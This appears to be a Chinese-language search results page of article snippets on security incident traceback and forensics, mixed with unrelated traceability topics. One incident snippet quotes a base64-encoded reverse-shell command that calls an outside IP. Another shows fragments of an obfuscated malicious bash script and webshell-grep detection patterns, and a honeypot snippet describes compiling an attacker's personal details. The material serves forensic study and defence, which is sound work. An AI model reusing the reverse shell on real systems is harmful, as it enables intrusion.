- 综合排序
- 最热优先
- 最新优先
- 来自专栏网络安全溯源
网络安全溯源指南
下载地址:https://github.com/wsfengfan/SecurityTraceability/ 目录 一、 window系统溯源 1、 检查系统账号安全 1.1查看服务器是否存在可疑账号 检查启动项 3.2查看计划任务 3.3排查服务自启动 4、 检查系统相关信息 4.1查看系统补丁信息 4.2查看近期创建修改的文件 二、 Linux系统溯源 PID及程序进程 4、 文件排查 4.1find命令的使用 4.2敏感目录 4.3基于时间点查找 三、日志分析 1、window日志分析 1.1安全日志分析 Window 1.1WinFR 1.2Windows File Recovery 2、 Linux 2.1losf命令 2.2extundelete 2.3testdisk 五、溯源到人 1、IP溯源 2、ID溯源 3、手机号溯源 4、EMail溯源 5、域名溯源 6、木马分析(云沙箱)Linux系统溯源排查1、系统排查1.1 系统信息$ lscpu #
1K30编辑于 2023-11-20 - 来自专栏Bypass
安全攻击溯源思路及案例
---- ---- 1、攻击源捕获 安全设备报警,如扫描IP、威胁阻断、病毒木马、入侵事件等 日志与流量分析,异常的通讯流量、攻击源与攻击目标等 服务器资源异常,异常的文件、账号、进程、端口,启动项、 计划任务和服务等 邮件钓鱼,获取恶意文件样本、钓鱼网站URL等 蜜罐系统,获取攻击者行为、意图的相关信息 2、溯源反制手段 IP定位技术 根据IP定位物理地址--代理IP 溯源案例:通过 --域名隐私保护 溯源案例:通过攻击IP历史解析记录/域名,对域名注册信息进行溯源分析 恶意样本 提取样本特征、用户名、ID、邮箱、C2服务器等信息--同源分析 溯源案例:样本分析过程中 案例二:Web入侵溯源 攻防场景:攻击者通过NDAY和0DAY漏洞渗入服务器网段,Webshell 触发安全预警或者威胁检测阻断了C&C域名的通讯。 溯源方式:隔离webshell样本,使用Web日志还原攻击路径,找到安全漏洞位置进行漏洞修复,从日志可以找到攻击者的IP地址,但攻击者一般都会使用代理服务器或匿名网络(例如Tor)来掩盖其真实的IP地址
3.3K32发布于 2020-10-26 - 来自专栏FreeBuf
记一次“受到攻击后不开心从而进行溯源”的安全溯源事件
但是想想,处理过那么多告警,几乎都是这样放过对面,这次我不想放过了,即使只是一个来自于互联网的盲打攻击,我也想看看到底是什么人干的,于是就有了这篇溯源文章… … 安全分析 1. 2021年7月某日下午, 攻击反制 1、这里就得对黑客做个吐槽了,我作为一个非攻击队的底层安全人员,都知道给cobaltstrike注册一个域名,并通过修改证书增加cdn服务器对系统进行隐匿。 到此溯源分析工作完毕,毕竟得罪不起apt大佬,也没能耐能得罪人家 收尾工作 对白象apt组织做一个简单的介绍: ? ? 总结 溯源和反制大部分时候护网蓝队干的比较多,不知道有没有人是专门进行黑客追踪的,如果有这方面的大佬可以带带老弟。 分析过程中会发现好多问题,也许溯源很长时间一下线索断了,对个人信心打击比较大,但对于我这样没心没肺的来说,就那样吧。
87040发布于 2021-07-27 - 来自专栏农夫安全
某服务器安全溯源审计报告
对trtgsasefd.conf文件进行木马分析未发现问题 对外网IP:23.33.178.8中的clock-applet文件进行木马分析未发现问题 日志记录分析 日志文件只有8月和9月份的 查看/var
1.3K60发布于 2018-03-30 - 来自专栏绿盟科技研究通讯
安全知识图谱 | 按图索“迹” 追踪溯源
安全知识图谱的构建是集成了与安全相关的异构知识库如CVE[4],CCE[5],CVSS[6],CAPEC[7],CYBOX[8],KillChain和STUCCO等。 基于图中路径的攻击信息并不能完全反应攻击路径,需要结合威胁评估方法,把溯源图中的节点看作目标实体,边看作攻击行为,通过攻击威胁评估模型得到溯源图中每个节点的威胁度,基于节点的威胁度通过贪心算法找到攻击路径 图4 溯源图中的节点威胁度评估 真实的企业安全运营中,攻击行为是有一定的时序性,因此在调查攻击路径时需要考虑攻击行为的时序特征。通过对节点和边的威胁评估结果为节点与边赋予一个表述威胁度的权重。 在攻击路径调查过程中,通常始于已确定的攻击行为或已攻陷的受害者攻击路径,而溯源的终止条件通常为外部IP的网络连接行为,如果无法溯源到网络连接行为则该主机即为最终攻击者。 这里路径溯源算法采用贪心算法。 Available from: https: //capec.mitre.org/. 8. Mitre. Cyber observable expression.
1.3K40编辑于 2021-12-10 - 来自专栏JAVA技术zhai
【网络安全】浅谈IP溯源的原理及方法
溯源思路 1、攻击源捕获 安全设备报警,如扫描IP、威胁阻断、病毒木马、入侵事件等 日志与流量分析,异常的通讯流量、攻击源与攻击目标等 服务器资源异常,异常的文件、账号、进程、端口,启动项、计划任务和服务等 —域名隐私保护 溯源案例:通过攻击IP历史解析记录/域名,对域名注册信息进行溯源分析 2.4 恶意样本 提取样本特征、用户名、ID、邮箱、C2服务器等信息—同源分析 溯源案例:样本分析过程中,发现攻击者的个人 渗透、水坑攻击、近源渗透、社会工程等 3.2 攻击者身份画像 虚拟身份:ID、昵称、网名 真实身份:姓名、物理位置 联系方式:手机号、qq/微信、邮箱 组织情况:单位名称、职位信息 4、安全攻击溯源篇 4.2 案例二:Web入侵溯源 攻防场景:攻击者通过NDAY和0DAY漏洞渗入服务器网段,Webshell 触发安全预警或者威胁检测阻断了C&C域名的通讯。 溯源方式:隔离webshell样本,使用Web日志还原攻击路径,找到安全漏洞位置进行漏洞修复,从日志可以找到攻击者的IP地址,但攻击者一般都会使用代理服务器或匿名网络(例如Tor)来掩盖其真实的IP地址
3.8K21编辑于 2022-05-10 - 来自专栏Netkiller
食品安全溯源区块链解决方案探索
食品安全溯源案例 33.2.1. 背景 需求是通过区块链跟踪产品,实现产品产地,生产,流通等环节溯源。 安全问题 我将安全划分为六层,分别是: +----------+-----------------------------+ | 实体层 | 物 ,安全分为很多层,区块链只能做到存储层的安全。 区块链无法解决用户层,应用层,逻辑层等安全问题,他只能保证存储在硬盘上的区块不被修改。 颗粒度问题 朔源的颗粒度问题,例如“红酒”的溯源,我们是将单位溯源做到箱呢?还是打,或是瓶呢?
4.5K100发布于 2018-03-27 - 来自专栏数通
网络安全溯源方法,请网工务必掌握!
在当今这个数字化飞速发展的时代,网络攻击已经成为一种常见且严重的安全威胁。无论是个人用户还是大型企业,都可能成为网络攻击的目标。面对日益猖獗的网络攻击,攻击溯源成为了网络安全领域的一项重要工作。 那么,什么是攻击溯源?在网络安全中,攻击溯源有哪些方法呢?阿祥将为您详细解析。 什么是攻击溯源? 攻击溯源是指通过分析攻击事件的特点、行为、产生的日志等信息,追溯攻击者的来源和目的。 系统日志:包括操作系统日志、应用程序日志、安全设备日志等。这些日志记录了系统的运行状态、用户活动、异常事件等信息,是追踪攻击者的重要线索。 执法机构合作:与警方和国家安全机构合作,追踪和起诉网络犯罪分子。 结语 网络安全攻击溯源是一项复杂且多维的任务,需要综合运用多种技术和方法。 通过有效的攻击溯源,不仅可以迅速响应和缓解当前的安全威胁,还可以为未来的防御策略提供宝贵的见解和指导。希望本文能为您在网络安全领域的探索提供一些帮助。
1K10编辑于 2024-12-03 - 来自专栏数据派THU
讲座预告 | 中美网络安全标准追根溯源
mutability|IMMUTABLE|imageUrl|https://ask.qcloudimg.com/http-save/yehe-1269631/26b591d9cc02373fa34c7f8f2c5b910b.png http-save/yehe-1269631/0b09905f290e947a189051a835f1a5d4.png^0|0|1|0|0|0|1|1|0|0|1|2^^$0|@$1|2|3|4|5|6|7|O|8| @]|9|@$A|P|B|Q|1|R]]|C|@]]|$1|D|3|4|5|6|7|S|8|@]|9|@$A|T|B|U|1|V]]|C|@]]|$1|E|3|4|5|6|7|W|8|@]|9|@$A|
33100编辑于 2022-09-14 - 来自专栏Netkiller
食品安全溯源区块链解决方案探索
食品溯源案例 33.2.1. 背景 需求是通过区块链跟踪产品,实现产品产地,生产,流通等环节溯源。 安全问题 我将安全划分为六层,分别是: +----------+-----------------------------+ | 实体层 | 物 ,安全分为很多层,区块链只能做到存储层的安全。 颗粒度问题 朔源的颗粒度问题,例如“红酒”的溯源,我们是将单位溯源做到箱呢?还是打,或是瓶呢? Hyperledger fabric) Hyperledger Fabric 积分代币上链方案 Hyperledger fabric Chaincode 开发详解 Hyperledger也能实现Token代币 食品安全溯源区块链解决方案探索
9K1501发布于 2018-03-14 - 来自专栏安恒网络空间安全讲武堂
溯源小记
溯源的思路 看对方的目的是什么,就是最终目标是做什么。然后根据自己经验 看看达到这个目标 需要进行什么操作 逆推回去。看看这些过程都会留下什么日志。
86920发布于 2018-09-21 - 来自专栏学习之旅
【安全】记录钓鱼邮件中木马病毒的分析溯源
Generic.ShellCode.RDI.Marte.4.D99E8D57:这是一个通用的壳代码检测名称,可能与某些恶意软件的执行代码有关,用于执行特定的恶意操作。 8、反编译dll看一下他的代码。 Decompiler Explorer问了一下Kimi,他说的是: 这段代码是一个dll文件的入口点函数以及相关的辅助函数实现。 **安全机制**:包含安全cookie的初始化和检查,用于防止缓冲区溢出等安全问题。 3. **异常处理**:实现了异常处理机制,包括异常过滤、安全失败报告等。 4. - **安全机制**: - `___security_init_cookie`:初始化安全cookie,用于防止缓冲区溢出。 **安全机制的实现**:通过安全cookie和异常处理机制,增强了dll的安全性,防止常见的安全漏洞。 2.
80710编辑于 2025-04-09 - 来自专栏安全小圈
蜜罐溯源
到了今天,蜜罐技术已经成为网络安全中的一种入侵诱饵,目的是引诱黑客前来攻击,并收集黑客相关的证据和信息。 ? 随着经济的发展,国家对安全行业的高度重视。 猜测163邮箱也是该号码‘、QQ号码 支付宝溯源——转账——查找黑客信息 REG007网站: https://www.reg007.com/ 查询邮箱注册过的网站 微博找回密码链接: https:// 0x03溯源结果 结果 ? IP位于湖南长沙 163邮箱、QQ号码、微信号码 手机号 相关好友,母亲信息 他的好友:张*,刘* 人物头像 附件 ? ? ? ? ? ? ? 结束!!! 弥 天 安全实验室
1.8K30发布于 2020-08-21 - 来自专栏腾讯云安全专家服务
入侵溯源难点和云溯源体系建设
image.png 在安全行业,攻击溯源领域一直是一个强烈依赖人力和经验型的领域。 image.png ---- 3.高效安全溯源技术解决方案,溯源工具是空白。 (3) 体系化安全溯源知识,工具建设:几乎空白 可能会有同学质疑,很多安全产品也提供此类功能呀? ——亲测过许多安全检测分析产品和工具,取证逻辑上强关联真的不准确! /bin/bash exec &>/dev/null echo sMA4p3iYpUgY2CJZoyKJ5M66ce+K50VAIO2IKC8A1NT2JSksIXBHXJ8PYNYVJ6p0 echo sMA4p3iYpUgY2CJZoyKJ5M66ce+K50VAIO2IKC8A1NT2JSksIXBHXJ8PYNYVJ6p0 exec &>/dev/null export PATH=$PATH:
4.4K201发布于 2021-03-16 - 来自专栏基础项目部署
centos入侵溯源
www/html/*/*egrep 'eval|\$_POST|\$_REQUEST|\$_GET|assert' /var/www/html/*检测redis配置文件/etc/redis.conf 的安全策略 redis.conf |grep bindcat /etc/redis.conf |grep requirepasscat /etc/redis.conf |grep protected-mode五、网络设备网络安全设备如防火墙 、行为监测,安全平台如EDR平台、势态感知平台,或者旁路流量记录中查找失陷主机的南北和东西流量日志信息,找到攻击来源
59520编辑于 2024-08-19 - 来自专栏数据派THU
干货 | 陆宝华:中美网络安全标准追根溯源
中央指令由公安部开展计算机安全工作,这就是中国计算机安全工作的起始。 二、等级保护的提出与信息系统的定义 1994年,国务院出台网络安全第一个法规:《中华人民共和国计算机信息系统安全保护条例》。 2、对计算机信息系统安全进行了定义 第三条:计算机信息系统的安全保护,应当保障计算机及其相关的和配套的设备、设施(含网络)的安全,运行环境的安全,保障信息的安全,保障计算机功能的正常发挥,以维护计算机信息系统的安全运行 4、范围、主管单位、规定了任何组织个人,不得危害计算机信息系统的安全 第九条:计算机信息系统实行安全等级保护。安全等级的划分标准和安全等级保护的具体办法,由公安部会同有关部门制定。 客体重用,在GB17859中作为一个独立的安全功能,在橘皮书当中是安全策略当中的一个子项。 审计,在GB17859中作为一个独立的安全功能,在橘皮书当中是安全责任当中的一个子项。 强制访问控制,在GB17859中作为一个独立的安全功能,在橘皮书当中是安全策略当中的一个子项。
72830编辑于 2022-09-23 - 来自专栏腾讯云安全专家服务
从一次攻击溯源中暴露的安全问题
/sh -c bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjMuMTA4LjExMS4xOC84MCAwPiYx}|{base64,-d}|{bash,-i} ---- 开始溯源! 逆向思维,从主机层分析——应用层展开分析溯源。 类RCE漏洞触发bash反弹shell远程命令执行 ---- 暴露问题 1.安全漏洞未及时修复,使用组件未及时更新 2.应用层日志nginx访问日志未配置,不具备应用层日志溯源能力 3.登录密钥配置不合理 门换了,小区对业主的自身的安全风险就不完全可控。 那么安全问题怎么来的呢?
1.6K112发布于 2021-03-03 - 来自专栏只喝牛奶的杀手
事件溯源模式
事件溯源模式具有以下优点: 事件不可变,并且可使用只追加操作进行存储。 用户界面、工作流或启动事件的进程可继续,处理事件的任务可在后台运行。 事件溯源不需要直接更新数据存储中的对象,因而有助于防止并发更新造成冲突。 但是,域模型必须仍然设计为避免可能导致不一致状态的请求。 但是,事件溯源事件的级别通常非常低,可能需要生成特定的集成事件。 通过执行响应事件的数据管理任务和具体化存储事件的视图,事件溯源通常与 CQRS 模式结合。 即使事件溯源会最大程度降低数据更新冲突的可能性,应用程序仍必须能够处理由最终一致性和缺少事务引起的不一致性。 尽管这不是事件溯源的主要特点,但却是通常的实施决策。 何时使用此模式 请在以下方案中使用此模式: 要捕获数据中的意图、用途或原因。
2K40发布于 2019-09-02 基于日志的邮件安全事件检测:从异常行为到攻击溯源
在邮件系统的安全防护中,日志分析是最基础、最重要的手段之一。通过对邮件服务器日志的深入分析,管理员可以识别并防范各种恶意行为,如自动化攻击、大量邮件投递、非法登录等安全事件。 本文将探讨如何利用邮件系统日志来检测恶意邮件行为,识别邮件系统中的异常行为,并结合入侵检测与防御系统(IDS/IPS)进行联合分析,实现对邮件安全事件的全方位监控与溯源。 具体来说,日志可以帮助我们:发现恶意邮件行为,如垃圾邮件、大规模邮件投递等;识别攻击者的异常操作,诸如暴力破解、恶意登录、非法发信等;辅助溯源,追踪攻击者的IP、设备信息,甚至邮件内容。 邮件系统的安全防护需要结合多种策略与工具,通过综合分析和自动化防御机制,确保企业邮件系统不被恶意攻击者利用,保障通信的安全与顺畅。 在实际操作中,管理员需要定期审查邮件系统日志、优化IDS/IPS配置,并及时响应安全事件,形成完善的安全防护体系。
24410编辑于 2025-11-20- 来自专栏网络技术联盟站
如何配置攻击溯源?
攻击溯源通过对上送CPU的报文进行采样分析,如果报文速率(pps)超过设置的阈值,则认为是攻击报文。 对攻击报文进行分析,可以找到攻击源的IP地址、MAC地址、接口和VLAN。 auto-defend attack-source命令查看 攻击源惩罚 将攻击报文进行丢弃 将攻击报文进入的接口shutdown (谨慎使用) 其他(配置流策略或者黑名单) 配置思路 创建防攻击策略 配置攻击溯源 (采样比、检查阈值、溯源模式、防范的报文类型、白名单、告警功能、惩罚措施) 应用防攻击策略 操作步骤 <HUAWEI> system-view //进入系统视图 [HUAWEI] cpu-defend 10 //配置攻击溯源采样比 [HUAWEI-cpu-defend-policy-test] auto-defend alarm enable //使能攻击溯源告警功能 ] auto-defend action deny //配置攻击溯源的惩罚措施 [HUAWEI-cpu-defend-policy-test] quit //返回系统视图 [
1.4K10发布于 2019-11-29
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号